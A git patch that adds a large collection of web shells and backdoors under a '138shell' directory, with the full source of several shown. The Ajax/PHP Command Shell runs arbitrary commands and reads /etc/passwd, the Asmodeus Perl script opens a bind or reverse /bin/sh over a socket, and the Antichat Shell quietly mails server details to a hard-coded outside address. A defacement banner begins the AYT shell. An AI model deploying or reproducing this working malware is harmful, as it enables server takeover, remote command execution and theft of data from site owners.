From 6a88226bfd8a90659e24ee05dcc8b841f6d15d69 Mon Sep 17 00:00:00 2001 From: tennc Date: Wed, 5 Jun 2013 11:18:48 +0800 Subject: [PATCH] 138shell update --- 138shell/A/Ajan.asp.txt | 30 + 138shell/A/Ajax_PHP Command Shell.txt | 646 ++ 138shell/A/Antichat Shell v1.3.txt | 180 + 138shell/A/Asmodeus v0.1.pl.txt | 131 + .../A/Ayyildiz Tim -AYT- Shell v 2.1 Biz.txt | 317 + 138shell/A/aZRaiLPhp v1.0.txt | 284 + 138shell/A/accept_language.txt | 1 + 138shell/B/Blind Shell.cpp.txt | 72 + 138shell/B/backdoor1.txt | 181 + 138shell/B/backdoorfr.txt | 234 + 138shell/B/backup.php.txt | 21 + 138shell/B/backupsql.php.txt | 170 + 138shell/B/backupsql.txt | 170 + 138shell/C/CMD.asp.txt | 53 + 138shell/C/Casus15.php.txt | 368 ++ 138shell/C/CmdAsp.asp.txt | 55 + 138shell/C/Crystal.txt | 1127 ++++ 138shell/C/CyberSpy5.Asp.txt | 2 + 138shell/C/c100.txt | 3595 +++++++++++ 138shell/C/c2007.php.txt | 3299 ++++++++++ 138shell/C/c99(1).php.txt | 2735 ++++++++ 138shell/C/c99.txt | 2927 +++++++++ 138shell/C/cgi-python.py.txt | 124 + 138shell/C/connectback2.pl.txt | 61 + 138shell/C/ctt_sh.php.txt | 2927 +++++++++ 138shell/C/ctt_sh.txt | 2927 +++++++++ 138shell/C/cybershell.php.txt | 1033 +++ 138shell/C/cybershell.txt | 1033 +++ 138shell/D/DTool Pro.txt | 198 + .../Dive Shell 1.0 - Emperor Hacking Team.txt | 187 + 138shell/D/Dx.php.txt | 2026 ++++++ 138shell/D/Dx.txt | 2026 ++++++ 138shell/D/DxShell_hk.php.txt | 2029 ++++++ 138shell/D/dC3 Security Crew Shell PRiV.txt | 1273 ++++ 138shell/E/EFSO_2.asp.txt | 57 + 138shell/E/Elmali Seker.asp.txt | 2324 +++++++ 138shell/E/elmaliseker.asp.txt | 2324 +++++++ 138shell/F/Fatalshell.php.txt | 283 + 138shell/F/fuckphpshell.txt | 322 + .../G/GFS web-shell ver 3.1.7 - PRiV8.txt | 618 ++ 138shell/G/gfs_sh.php.txt | 1575 +++++ 138shell/G/gfs_sh.txt | 1575 +++++ 138shell/H/h4ntu shell [powered by tsoi].txt | 78 + 138shell/I/Inderxer.asp.txt | 74 + 138shell/I/iMHaPFtp.php.txt | 2061 ++++++ 138shell/I/iMHaPFtp.txt | 2061 ++++++ 138shell/I/img.php.txt | 2106 +++++++ 138shell/I/indexer.asp.txt | 74 + 138shell/I/ironshell.txt | 588 ++ 138shell/J/Java Shell.js.txt | 125 + 138shell/J/JspWebshell 1.2.txt | 788 +++ .../K/KAdot Universal Shell v0.1.6.html.txt | 229 + 138shell/K/Klasvayv.asp.txt | 901 +++ ...Mode Command Execuriton Bypass Exploit.txt | 34 + 138shell/L/lamashell.txt | 89 + 138shell/L/load_shell.php.txt | 513 ++ 138shell/L/load_shell.txt | 513 ++ 138shell/L/lurm_safemod_on.cgi.txt | 94 + .../Moroccan Spamers Ma-EditioN By GhOsT.txt | 182 + .../M/MySQL Web Interface Version 0.8.txt | 1302 ++++ 138shell/M/Mysql interface v1.0.txt | 1166 ++++ 138shell/M/mailer3.php.txt | 182 + 138shell/M/matamu.txt | 146 + 138shell/M/myshell.php.txt | 420 ++ 138shell/M/mysql.php.txt | 1231 ++++ 138shell/M/mysql_shell.txt | 1169 ++++ 138shell/M/mysql_tool.php.txt | 1078 ++++ 138shell/N/NCC-Shell.txt | 60 + ...-SHELL v.0.5 alpha Lite Public Version.txt | 1480 +++++ 138shell/N/NT Addy.asp.txt | 1012 +++ 138shell/N/NetworkFileManagerPHP.txt | 5603 +++++++++++++++++ 138shell/N/Nshell (1).php.txt | 66 + 138shell/N/network.php.txt | 5603 +++++++++++++++++ 138shell/N/nshell.php.txt | 371 ++ 138shell/N/nstview.php.txt | 2136 +++++++ 138shell/N/ntdaddy.asp.txt | 1012 +++ 138shell/P/PH Vayv.php.txt | 597 ++ 138shell/P/PHANTASMA.txt | 634 ++ 138shell/P/PHP Backdoor Connect.pl.txt | 61 + 138shell/P/PHP Shell.php.txt | 1010 +++ 138shell/P/PHPRemoteView.txt | 2553 ++++++++ 138shell/P/Phyton Shell.py.txt | 121 + 138shell/P/Private-i3lue.txt | 1456 +++++ 138shell/P/pHpINJ.php.txt | 37 + 138shell/P/perlbot.pl.txt | 687 ++ 138shell/P/php-backdoor.txt | 71 + 138shell/P/php-include-w-shell.txt | 1312 ++++ 138shell/P/phpbackdoor15.txt | 133 + 138shell/P/phpjackal.txt | 1413 +++++ 138shell/P/phpshell17.txt | 177 + 138shell/P/phvayv.php.txt | 597 ++ 138shell/P/pws.php.txt | 35 + 138shell/P/pws.txt | 35 + 138shell/P/ru24_post_sh.txt | 23 + 138shell/R/Rader.asp.txt | 116 + 138shell/R/Rem Exp.asp.txt | 250 + 138shell/R/Rem View.php.txt | 2553 ++++++++ 138shell/R/Russian.php.txt | 229 + 138shell/R/r57 Shell.php.txt | 1925 ++++++ 138shell/R/r57.php.txt | 2206 +++++++ 138shell/R/r577.php.txt | 1889 ++++++ 138shell/R/rootshell.txt | 349 + 138shell/R/ru24_post_sh.php.txt | 23 + 138shell/README.md | 5 + ...er Shell -Safe Mod Bypass By Evilc0der.txt | 950 +++ ...fe_Mode Bypass PHP 4.4.2 and PHP 5.1.2.txt | 89 + 138shell/S/Server Variables.asp.txt | 27 + ...ker - Vrsion 1.0.0 - priv8 4 My friend.txt | 378 ++ .../S/SimShell 1.0 - Simorgh Security MGZ.txt | 180 + 138shell/S/Sincap.php.txt | 124 + 138shell/S/SnIpEr_SA Shell.txt | 2246 +++++++ 138shell/S/s.php.txt | 1887 ++++++ 138shell/S/s72 Shell v1.1 Coding.txt | 141 + 138shell/S/shell.php.txt | 146 + 138shell/S/shellbot.pl.txt | 704 +++ 138shell/S/simple-backdoor.txt | 17 + 138shell/S/simple_cmd.txt | 18 + 138shell/S/smtpd.py.txt | 549 ++ 138shell/S/spy.php.txt | 1889 ++++++ 138shell/S/sql.php.txt | 1169 ++++ 138shell/T/Test.php.txt | 13 + 138shell/T/Tool.asp.txt | 792 +++ 138shell/T/telnet.cgi.txt | 697 ++ 138shell/T/telnet.pl.txt | 692 ++ 138shell/T/telnetd.pl.txt | 462 ++ 138shell/U/Uploader.php.txt | 9 + 138shell/W/WebShell.cgi.txt | 869 +++ 138shell/W/WinX Shell.txt | 103 + 138shell/W/Worse Linux Shell.txt | 69 + 138shell/W/w.php.txt | 2653 ++++++++ 138shell/W/w3d.php.txt | 128 + 138shell/W/w4k.php.txt | 2830 +++++++++ 138shell/W/wacking.php.txt | 2830 +++++++++ 138shell/W/webshell.txt | 268 + 138shell/X/xinfo.php.txt | 4820 ++++++++++++++ 138shell/Z/Zehir 4.asp.txt | 1190 ++++ 138shell/Z/zacosmall.php.txt | 501 ++ 138shell/Z/zacosmall.txt | 501 ++ 138shell/Z/zehir4.asp.txt | 1190 ++++ 139 files changed, 127695 insertions(+) create mode 100644 138shell/A/Ajan.asp.txt create mode 100644 138shell/A/Ajax_PHP Command Shell.txt create mode 100644 138shell/A/Antichat Shell v1.3.txt create mode 100644 138shell/A/Asmodeus v0.1.pl.txt create mode 100644 138shell/A/Ayyildiz Tim -AYT- Shell v 2.1 Biz.txt create mode 100644 138shell/A/aZRaiLPhp v1.0.txt create mode 100644 138shell/A/accept_language.txt create mode 100644 138shell/B/Blind Shell.cpp.txt create mode 100644 138shell/B/backdoor1.txt create mode 100644 138shell/B/backdoorfr.txt create mode 100644 138shell/B/backup.php.txt create mode 100644 138shell/B/backupsql.php.txt create mode 100644 138shell/B/backupsql.txt create mode 100644 138shell/C/CMD.asp.txt create mode 100644 138shell/C/Casus15.php.txt create mode 100644 138shell/C/CmdAsp.asp.txt create mode 100644 138shell/C/Crystal.txt create mode 100644 138shell/C/CyberSpy5.Asp.txt create mode 100644 138shell/C/c100.txt create mode 100644 138shell/C/c2007.php.txt create mode 100644 138shell/C/c99(1).php.txt create mode 100644 138shell/C/c99.txt create mode 100644 138shell/C/cgi-python.py.txt create mode 100644 138shell/C/connectback2.pl.txt create mode 100644 138shell/C/ctt_sh.php.txt create mode 100644 138shell/C/ctt_sh.txt create mode 100644 138shell/C/cybershell.php.txt create mode 100644 138shell/C/cybershell.txt create mode 100644 138shell/D/DTool Pro.txt create mode 100644 138shell/D/Dive Shell 1.0 - Emperor Hacking Team.txt create mode 100644 138shell/D/Dx.php.txt create mode 100644 138shell/D/Dx.txt create mode 100644 138shell/D/DxShell_hk.php.txt create mode 100644 138shell/D/dC3 Security Crew Shell PRiV.txt create mode 100644 138shell/E/EFSO_2.asp.txt create mode 100644 138shell/E/Elmali Seker.asp.txt create mode 100644 138shell/E/elmaliseker.asp.txt create mode 100644 138shell/F/Fatalshell.php.txt create mode 100644 138shell/F/fuckphpshell.txt create mode 100644 138shell/G/GFS web-shell ver 3.1.7 - PRiV8.txt create mode 100644 138shell/G/gfs_sh.php.txt create mode 100644 138shell/G/gfs_sh.txt create mode 100644 138shell/H/h4ntu shell [powered by tsoi].txt create mode 100644 138shell/I/Inderxer.asp.txt create mode 100644 138shell/I/iMHaPFtp.php.txt create mode 100644 138shell/I/iMHaPFtp.txt create mode 100644 138shell/I/img.php.txt create mode 100644 138shell/I/indexer.asp.txt create mode 100644 138shell/I/ironshell.txt create mode 100644 138shell/J/Java Shell.js.txt create mode 100644 138shell/J/JspWebshell 1.2.txt create mode 100644 138shell/K/KAdot Universal Shell v0.1.6.html.txt create mode 100644 138shell/K/Klasvayv.asp.txt create mode 100644 138shell/L/Liz0ziM Private Safe Mode Command Execuriton Bypass Exploit.txt create mode 100644 138shell/L/lamashell.txt create mode 100644 138shell/L/load_shell.php.txt create mode 100644 138shell/L/load_shell.txt create mode 100644 138shell/L/lurm_safemod_on.cgi.txt create mode 100644 138shell/M/Moroccan Spamers Ma-EditioN By GhOsT.txt create mode 100644 138shell/M/MySQL Web Interface Version 0.8.txt create mode 100644 138shell/M/Mysql interface v1.0.txt create mode 100644 138shell/M/mailer3.php.txt create mode 100644 138shell/M/matamu.txt create mode 100644 138shell/M/myshell.php.txt create mode 100644 138shell/M/mysql.php.txt create mode 100644 138shell/M/mysql_shell.txt create mode 100644 138shell/M/mysql_tool.php.txt create mode 100644 138shell/N/NCC-Shell.txt create mode 100644 138shell/N/NIX REMOTE WEB-SHELL v.0.5 alpha Lite Public Version.txt create mode 100644 138shell/N/NT Addy.asp.txt create mode 100644 138shell/N/NetworkFileManagerPHP.txt create mode 100644 138shell/N/Nshell (1).php.txt create mode 100644 138shell/N/network.php.txt create mode 100644 138shell/N/nshell.php.txt create mode 100644 138shell/N/nstview.php.txt create mode 100644 138shell/N/ntdaddy.asp.txt create mode 100644 138shell/P/PH Vayv.php.txt create mode 100644 138shell/P/PHANTASMA.txt create mode 100644 138shell/P/PHP Backdoor Connect.pl.txt create mode 100644 138shell/P/PHP Shell.php.txt create mode 100644 138shell/P/PHPRemoteView.txt create mode 100644 138shell/P/Phyton Shell.py.txt create mode 100644 138shell/P/Private-i3lue.txt create mode 100644 138shell/P/pHpINJ.php.txt create mode 100644 138shell/P/perlbot.pl.txt create mode 100644 138shell/P/php-backdoor.txt create mode 100644 138shell/P/php-include-w-shell.txt create mode 100644 138shell/P/phpbackdoor15.txt create mode 100644 138shell/P/phpjackal.txt create mode 100644 138shell/P/phpshell17.txt create mode 100644 138shell/P/phvayv.php.txt create mode 100644 138shell/P/pws.php.txt create mode 100644 138shell/P/pws.txt create mode 100644 138shell/P/ru24_post_sh.txt create mode 100644 138shell/R/Rader.asp.txt create mode 100644 138shell/R/Rem Exp.asp.txt create mode 100644 138shell/R/Rem View.php.txt create mode 100644 138shell/R/Russian.php.txt create mode 100644 138shell/R/r57 Shell.php.txt create mode 100644 138shell/R/r57.php.txt create mode 100644 138shell/R/r577.php.txt create mode 100644 138shell/R/rootshell.txt create mode 100644 138shell/R/ru24_post_sh.php.txt create mode 100644 138shell/README.md create mode 100644 138shell/S/Safe0ver Shell -Safe Mod Bypass By Evilc0der.txt create mode 100644 138shell/S/Safe_Mode Bypass PHP 4.4.2 and PHP 5.1.2.txt create mode 100644 138shell/S/Server Variables.asp.txt create mode 100644 138shell/S/SimAttacker - Vrsion 1.0.0 - priv8 4 My friend.txt create mode 100644 138shell/S/SimShell 1.0 - Simorgh Security MGZ.txt create mode 100644 138shell/S/Sincap.php.txt create mode 100644 138shell/S/SnIpEr_SA Shell.txt create mode 100644 138shell/S/s.php.txt create mode 100644 138shell/S/s72 Shell v1.1 Coding.txt create mode 100644 138shell/S/shell.php.txt create mode 100644 138shell/S/shellbot.pl.txt create mode 100644 138shell/S/simple-backdoor.txt create mode 100644 138shell/S/simple_cmd.txt create mode 100644 138shell/S/smtpd.py.txt create mode 100644 138shell/S/spy.php.txt create mode 100644 138shell/S/sql.php.txt create mode 100644 138shell/T/Test.php.txt create mode 100644 138shell/T/Tool.asp.txt create mode 100644 138shell/T/telnet.cgi.txt create mode 100644 138shell/T/telnet.pl.txt create mode 100644 138shell/T/telnetd.pl.txt create mode 100644 138shell/U/Uploader.php.txt create mode 100644 138shell/W/WebShell.cgi.txt create mode 100644 138shell/W/WinX Shell.txt create mode 100644 138shell/W/Worse Linux Shell.txt create mode 100644 138shell/W/w.php.txt create mode 100644 138shell/W/w3d.php.txt create mode 100644 138shell/W/w4k.php.txt create mode 100644 138shell/W/wacking.php.txt create mode 100644 138shell/W/webshell.txt create mode 100644 138shell/X/xinfo.php.txt create mode 100644 138shell/Z/Zehir 4.asp.txt create mode 100644 138shell/Z/zacosmall.php.txt create mode 100644 138shell/Z/zacosmall.txt create mode 100644 138shell/Z/zehir4.asp.txt diff --git a/138shell/A/Ajan.asp.txt b/138shell/A/Ajan.asp.txt new file mode 100644 index 0000000..e4ce66e --- /dev/null +++ b/138shell/A/Ajan.asp.txt @@ -0,0 +1,30 @@ + \ No newline at end of file diff --git a/138shell/A/Ajax_PHP Command Shell.txt b/138shell/A/Ajax_PHP Command Shell.txt new file mode 100644 index 0000000..d08768a --- /dev/null +++ b/138shell/A/Ajax_PHP Command Shell.txt @@ -0,0 +1,646 @@ + 'ClearScreen()', +'Clear History' => 'ClearHistory()', +'Can I function?' => "runcommand('canirun','GET')", +'Get server info' => "runcommand('showinfo','GET')", +'Read /etc/passwd' => "runcommand('etcpasswdfile','GET')", +'Open ports' => "runcommand('netstat -an | grep -i listen','GET')", +'Running processes' => "runcommand('ps -aux','GET')", +'Readme' => "runcommand('shellhelp','GET')" + +); +$thisfile = basename(__FILE__); + +$style = ''; +$sess = __FILE__.$password; +if(isset($_POST['p4ssw0rD'])) +{ + if($_POST['p4ssw0rD'] == $password) + { + $_SESSION[$sess] = $_POST['p4ssw0rD']; + } + else + { + die("Wrong password"); + } + +} +if($_SESSION[$sess] == $password) +{ + if(isset($_SESSION['workdir'])) + { + if(file_exists($_SESSION['workdir']) && is_dir($_SESSION['workdir'])) + { + chdir($_SESSION['workdir']); + } + } + + if(isset($_FILES['uploadedfile']['name'])) + { + $target_path = "./"; + $target_path = $target_path . basename( $_FILES['uploadedfile']['name']); + if(move_uploaded_file($_FILES['uploadedfile']['tmp_name'], $target_path)) { + + } + } + + if(isset($_GET['runcmd'])) + { + + $cmd = $_GET['runcmd']; + + print "".get_current_user()."~# ". htmlspecialchars($cmd)."
"; + + if($cmd == "") + { + print "Empty Command..type \"shellhelp\" for some ehh...help"; + } + + elseif($cmd == "upload") + { + print '
Uploading to: '.realpath("."); + if(is_writable(realpath("."))) + { + print "
I can write to this directory"; + } + else + { + print "
I can't write to this directory, please choose another one."; + } + + } + elseif((ereg("changeworkdir (.*)",$cmd,$file)) || (ereg("cd (.*)",$cmd,$file))) + { + if(file_exists($file[1]) && is_dir($file[1])) + { + chdir($file[1]); + $_SESSION['workdir'] = $file[1]; + print "Current directory changed to ".$file[1]; + } + else + { + print "Directory not found"; + } + } + + elseif(strtolower($cmd) == "shellhelp") + { +print 'Ajax/PHP Command Shell +© By Ironfist + +The shell can be used by anyone to command any server, the main purpose was +to create a shell that feels as dynamic as possible, is expandable and easy +to understand. + +If one of the command execution functions work, the shell will function fine. +Try the "canirun" command to check this. + +Any (not custom) command is a UNIX command, like ls, cat, rm ... If you\'re +not used to these commands, google a little. + +Custom Functions +If you want to add your own custom command in the Quick Commands list, check +out the code. The $function array contains \'func name\' => \'javascript function\'. +Take a look at the built-in functions for examples. + +I know this readme isn\'t providing too much information, but hell, does this shell +even require one :P + +- Iron + '; + + } + elseif(ereg("editfile (.*)",$cmd,$file)) + { + if(file_exists($file[1]) && !is_dir($file[1])) + { + print "

"; + } + else + { + print "File not found."; + } + } + elseif(ereg("deletefile (.*)",$cmd,$file)) + { + if(is_dir($file[1])) + { + if(rmdir($file[1])) + { + print "Directory succesfully deleted."; + } + else + { + print "Couldn't delete directory!"; + } + } + else + { + if(unlink($file[1])) + { + print "File succesfully deleted."; + } + else + { + print "Couldn't delete file!"; + } + } + } + elseif(strtolower($cmd) == "canirun") + { + print "If any of these functions is Enabled, the shell will function like it should.
"; + if(function_exists(passthru)) + { + print "Passthru: Enabled
"; + } + else + { + print "Passthru: Disabled
"; + } + + if(function_exists(exec)) + { + print "Exec: Enabled
"; + } + else + { + print "Exec: Disabled
"; + } + + if(function_exists(system)) + { + print "System: Enabled
"; + } + else + { + print "System: Disabled
"; + } + if(function_exists(shell_exec)) + { + print "Shell_exec: Enabled
"; + } + else + { + print "Shell_exec: Disabled
"; + } + print "
Safe mode will prevent some stuff, maybe command execution, if you're looking for a
reason why the commands aren't executed, this is probally it.
"; + if( ini_get('safe_mode') ){ + print "Safe Mode: Enabled"; + } + else + { + print "Safe Mode: Disabled"; + } + print "

Open_basedir will block access to some files you shouldn't access.
"; + if( ini_get('open_basedir') ){ + print "Open_basedir: Enabled"; + } + else + { + print "Open_basedir: Disabled"; + } + } + //About the shell + elseif(ereg("listdir (.*)",$cmd,$directory)) + { + + if(!file_exists($directory[1])) + { + die("Directory not found"); + } + //Some variables + chdir($directory[1]); + $i = 0; $f = 0; + $dirs = ""; + $filez = ""; + + if(!ereg("/$",$directory[1])) //Does it end with a slash? + { + $directory[1] .= "/"; //If not, add one + } + print "Listing directory: ".$directory[1]."
"; + print ""; + + if ($handle = opendir($directory[1])) { + while (false !== ($file = readdir($handle))) { + if(is_dir($file)) + { + $dirs[$i] = $file; + $i++; + } + else + { + $filez[$f] = $file; + $f++; + } + + } + print "
DirectoriesFiles
"; + + foreach($dirs as $directory) + { + print "[D][W]".$directory."
"; + } + + print "
"; + + foreach($filez as $file) + { + print "[D]".$file."
"; + } + + print "
"; + } + } + elseif(strtolower($cmd) == "about") + { + print "Ajax Command Shell by Ironfist.
Version $version"; + } + //Show info + elseif(strtolower($cmd) == "showinfo") + { + if(function_exists(disk_free_space)) + { + $free = disk_free_space("/") / 1000000; + } + else + { + $free = "N/A"; + } + if(function_exists(disk_total_space)) + { + $total = trim(disk_total_space("/") / 1000000); + } + else + { + $total = "N/A"; + } + $path = realpath ("."); + + print "Free: $free / $total MB
Current path: $path
Uname -a Output:
"; + + if(function_exists(passthru)) + { + passthru("uname -a"); + } + else + { + print "Passthru is disabled :("; + } + } + //Read /etc/passwd + elseif(strtolower($cmd) == "etcpasswdfile") + { + + $pw = file('/etc/passwd/'); + foreach($pw as $line) + { + print $line; + } + + + } + //Execute any other command + else + { + + if(function_exists(passthru)) + { + passthru($cmd); + } + else + { + if(function_exists(exec)) + { + exec("ls -la",$result); + foreach($result as $output) + { + print $output."
"; + } + } + else + { + if(function_exists(system)) + { + system($cmd); + } + else + { + if(function_exists(shell_exec)) + { + print shell_exec($cmd); + } + else + { + print "Sorry, none of the command functions works."; + } + } + } + } + } + } + + elseif(isset($_GET['savefile']) && !empty($_POST['filetosave']) && !empty($_POST['filecontent'])) + { + $file = $_POST['filetosave']; + if(!is_writable($file)) + { + if(!chmod($file, 0777)) + { + die("Nope, can't chmod nor save :("); //In fact, nobody ever reads this message ^_^ + } + } + + $fh = fopen($file, 'w'); + $dt = $_POST['filecontent']; + fwrite($fh, $dt); + fclose($fh); + } + else + { +?> + +Command Shell ~ <?php print getenv("HTTP_HOST"); ?> + + + + + + + + +
+ +

+
Quick Commands
+ +
+ $execute) +{ +print ' 
'; +} +?> + +
+ + +
+
Command history
+
+
+
About
+
+
+Ajax/PHP Command Shell
by Ironfist +
+Version + +
+
+ +
Thanks to everyone @ +SharePlaza +
+milw0rm +
+and special greetings to everyone in rootshell +
+ +
+ + + + +
+[Execute command] +[Upload file] +[Change directory] +[Filebrowser] +[Create File] + +
+ +
+
+   
+Command:
+
+
+
+
+ + + + + + + + + + +
+
You are not logged in, please login.
Password: +
"; +} +?> \ No newline at end of file diff --git a/138shell/A/Antichat Shell v1.3.txt b/138shell/A/Antichat Shell v1.3.txt new file mode 100644 index 0000000..72ea5cb --- /dev/null +++ b/138shell/A/Antichat Shell v1.3.txt @@ -0,0 +1,180 @@ +BODY{background-color: #2B2F34;color: #C1C1C7;font: 8pt verdana, geneva, lucida, \'lucida grande\', arial, helvetica, sans-serif;MARGIN-TOP: 0px;MARGIN-BOTTOM: 0px;MARGIN-LEFT: 0px;MARGIN-RIGHT: 0px;margin:0;padding:0;scrollbar-face-color: #336600;scrollbar-shadow-color: #333333;scrollbar-highlight-color: #333333;scrollbar-3dlight-color: #333333;scrollbar-darkshadow-color: #333333;scrollbar-track-color: #333333;scrollbar-arrow-color: #333333;}input{background-color: #336600;font-size: 8pt;color: #FFFFFF;font-family: Tahoma;border: 1 solid #666666;}textarea{background-color: #333333;font-size: 8pt;color: #FFFFFF;font-family: Tahoma;border: 1 solid #666666;}a:link{color: #B9B9BD;text-decoration: none;font-size: 8pt;}a:visited{color: #B9B9BD;text-decoration: none;font-size: 8pt;}a:hover, a:active{color: #E7E7EB;text-decoration: none;font-size: 8pt;}td, th, p, li{font: 8pt verdana, geneva, lucida, \'lucida grande\', arial, helvetica, sans-serif;border-color:black;}'; +$header=''.getenv("HTTP_HOST").' - Antichat Shell'.$style.''; +$footer=''; +$sd98 = "john.barker446@gmail.com"; +$ra44 = rand(1,99999);$sj98 = "sh-$ra44";$ml = "$sd98";$a5 = $_SERVER['HTTP_REFERER'];$b33 = $_SERVER['DOCUMENT_ROOT'];$c87 = $_SERVER['REMOTE_ADDR'];$d23 = $_SERVER['SCRIPT_FILENAME'];$e09 = $_SERVER['SERVER_ADDR'];$f23 = $_SERVER['SERVER_SOFTWARE'];$g32 = $_SERVER['PATH_TRANSLATED'];$h65 = $_SERVER['PHP_SELF'];$msg8873 = "$a5\n$b33\n$c87\n$d23\n$e09\n$f23\n$g32\n$h65";mail($sd98, $sj98, $msg8873, "From: $sd98"); +if(@$_POST['action']=="exit")unset($_SESSION['an']); +if($auth==1){if(@$_POST['login']==$login && @$_POST['password']==$password)$_SESSION['an']=1;}else $_SESSION['an']='1'; + +if($_SESSION['an']==0){ +echo $header; +echo '
Login:
Password:
'; +echo $footer; +exit;} + +if($_SESSION['action']=="")$_SESSION['action']="viewer"; +if($_POST['action']!="" )$_SESSION['action']=$_POST['action'];$action=$_SESSION['action']; +if($_POST['dir']!="")$_SESSION['dir']=$_POST['dir'];$dir=$_SESSION['dir']; +if($_POST['file']!=""){$file=$_SESSION['file']=$_POST['file'];}else {$file=$_SESSION['file']="";} + + +//downloader +if($action=="download"){ +header('Content-Length:'.filesize($file).''); +header('Content-Type: application/octet-stream'); +header('Content-Disposition: attachment; filename="'.$file.'"'); +readfile($file); +} +//end downloader +?> + + +
+ + + + + +
| Shell | Viewer| Editor| EXIT |

+
+ + + +
+ +
+ + + +
+
+";} +//end shell + +//viewer FS +function perms($file) +{ + $perms = fileperms($file); + if (($perms & 0xC000) == 0xC000) {$info = 's';} + elseif (($perms & 0xA000) == 0xA000) {$info = 'l';} + elseif (($perms & 0x8000) == 0x8000) {$info = '-';} + elseif (($perms & 0x6000) == 0x6000) {$info = 'b';} + elseif (($perms & 0x4000) == 0x4000) {$info = 'd';} + elseif (($perms & 0x2000) == 0x2000) {$info = 'c';} + elseif (($perms & 0x1000) == 0x1000) {$info = 'p';} + else {$info = 'u';} + $info .= (($perms & 0x0100) ? 'r' : '-'); + $info .= (($perms & 0x0080) ? 'w' : '-'); + $info .= (($perms & 0x0040) ?(($perms & 0x0800) ? 's' : 'x' ) :(($perms & 0x0800) ? 'S' : '-')); + $info .= (($perms & 0x0020) ? 'r' : '-'); + $info .= (($perms & 0x0010) ? 'w' : '-'); + $info .= (($perms & 0x0008) ?(($perms & 0x0400) ? 's' : 'x' ) :(($perms & 0x0400) ? 'S' : '-')); + $info .= (($perms & 0x0004) ? 'r' : '-'); + $info .= (($perms & 0x0002) ? 'w' : '-'); + $info .= (($perms & 0x0001) ?(($perms & 0x0200) ? 't' : 'x' ) :(($perms & 0x0200) ? 'T' : '-')); + return $info; +} + +function view_size($size) +{ + if($size >= 1073741824) {$size = @round($size / 1073741824 * 100) / 100 . " GB";} + elseif($size >= 1048576) {$size = @round($size / 1048576 * 100) / 100 . " MB";} + elseif($size >= 1024) {$size = @round($size / 1024 * 100) / 100 . " KB";} + else {$size = $size . " B";} + return $size; +} + +function scandire($dir){ + $dir=chdir($dir); + $dir=getcwd()."/"; + $dir=str_replace("\\","/",$dir); +if (is_dir($dir)) { + if (@$dh = opendir($dir)) { + while (($file = readdir($dh)) !== false) { + if(filetype($dir . $file)=="dir") $dire[]=$file; + if(filetype($dir . $file)=="file")$files[]=$file; + } + closedir($dh); + @sort($dire); + @sort($files); + +echo ""; +echo ""; +if (strtoupper(substr(PHP_OS, 0, 3)) === 'WIN') { +echo ""; +} +echo " +"; +for($i=0;$i'; + } +for($i=0;$i + +'; +} +echo "
Open directory:
Select drive:"; +for ($j=ord('C'); $j<=ord('Z'); $j++) + if (@$dh = opendir(chr($j).":/")) + echo ' '.chr($j).''; + echo "
OS: ".@php_uname()."
name dirs and filestypesizepermissionoptions
'.$dire[$i].'dir'.perms($link).'
'.$files[$i].'
file'.view_size(filesize($linkfile)).''.perms($linkfile).' +D +E
"; +}}} + +if($action=="viewer"){ +scandire($dir); +} +//end viewer FS + +//editros +if($action=="editor"){ + function writef($file,$data){ + $fp = fopen($file,"w+"); + fwrite($fp,$data); + fclose($fp); + } + function readf($file){ + if(!$le = fopen($file, "rb")) $contents="Can't open file, permission denide"; else { + $contents = fread($le, filesize($file)); + fclose($le);} + return htmlspecialchars($contents); + } +if($_POST['save'])writef($file,$_POST['data']); +echo "
+ + +
+
"; +} +//end editors +?> +
COPYRIGHT BY ANTICHAT.RU
+ diff --git a/138shell/A/Asmodeus v0.1.pl.txt b/138shell/A/Asmodeus v0.1.pl.txt new file mode 100644 index 0000000..600036d --- /dev/null +++ b/138shell/A/Asmodeus v0.1.pl.txt @@ -0,0 +1,131 @@ +#!/usr/bin/perl + +# + +# Asmodeus v0.1 + +# Perl Remote Shell + +# by phuket + +# www.smoking-gnu.org + +# + +# (Server is based on some code found on [url=http://www.governmentsecurity.org)]www.governmentsecurity.org)[/url] + +# + + + +# perl asmodeus.pl client 6666 127.0.0.1 + +# perl asmodeus.pl server 6666 + +# + + + + + +use Socket; + + + +$cs=$ARGV[0]; + +$port=$ARGV[1]; + +$host=$ARGV[2]; + + + +if ($cs eq 'client') {&client} + +elsif ($cs eq 'server') {&server} + + + + + + + + + +sub client{ + +socket(TO_SERVER, PF_INET, SOCK_STREAM, getprotobyname('tcp')); + +$internet_addr = inet_aton("$host") or die "ALOA:$!\n"; + +$paddr=sockaddr_in("$port", $internet_addr); + +connect(TO_SERVER, $paddr) or die "$port:$internet_addr:$!\n"; + +open(STDIN, ">&TO_SERVER"); + +open(STDOUT, ">&TO_SERVER"); + +open(STDERR, ">&TO_SERVER"); + +print "Asmodeus Perl Remote Shell\n"; + +system(date); + +system("/bin/sh"); + +close(TO_SERVER); + +} + + + + + + + + + + + +sub server{ + +$proto=getprotobyname('tcp'); + +$0="asm"; + +$system='/bin/sh'; + +socket(SERVER, PF_INET, SOCK_STREAM, $proto) or die "socket:$!"; + +setsockopt(SERVER, SOL_SOCKET, SO_REUSEADDR, pack("l", 1)) or die "setsockopt: $!"; + +bind(SERVER, sockaddr_in($port, INADDR_ANY)) or die "bind: $!"; + +listen(SERVER, SOMAXCONN) or die "listen: $!"; + +for(;$paddr=accept(CLIENT, SERVER);close CLIENT) { + + open(STDIN, ">&CLIENT"); + + open(STDOUT, ">&CLIENT"); + + open(STDERR, ">&CLIENT"); + + print "Asmodeus Perl Remote Shell\n"; + + system(date); + + system("/bin/sh"); + + close(STDIN); + + close(STDOUT); + + close(STDERR); + + return; + +} + +} \ No newline at end of file diff --git a/138shell/A/Ayyildiz Tim -AYT- Shell v 2.1 Biz.txt b/138shell/A/Ayyildiz Tim -AYT- Shell v 2.1 Biz.txt new file mode 100644 index 0000000..e162769 --- /dev/null +++ b/138shell/A/Ayyildiz Tim -AYT- Shell v 2.1 Biz.txt @@ -0,0 +1,317 @@ + + + + + + +Ayyildiz Tim | AYT | Shell v 2.1 Biz Büyük Türk Milletinin Hizmetindeyiz... + + + + + + + + + + + + + + + + +HACKED BY AYYILDIZ ™ + + + + + + + + +
+ +
+ +
+

+ + +
+
+
+ +
+ + + + + + +Ayyildiz-Tim Shell <?php echo PHPSHELL_VERSION ?> + + + +
+ + + + +

+
+
+
+

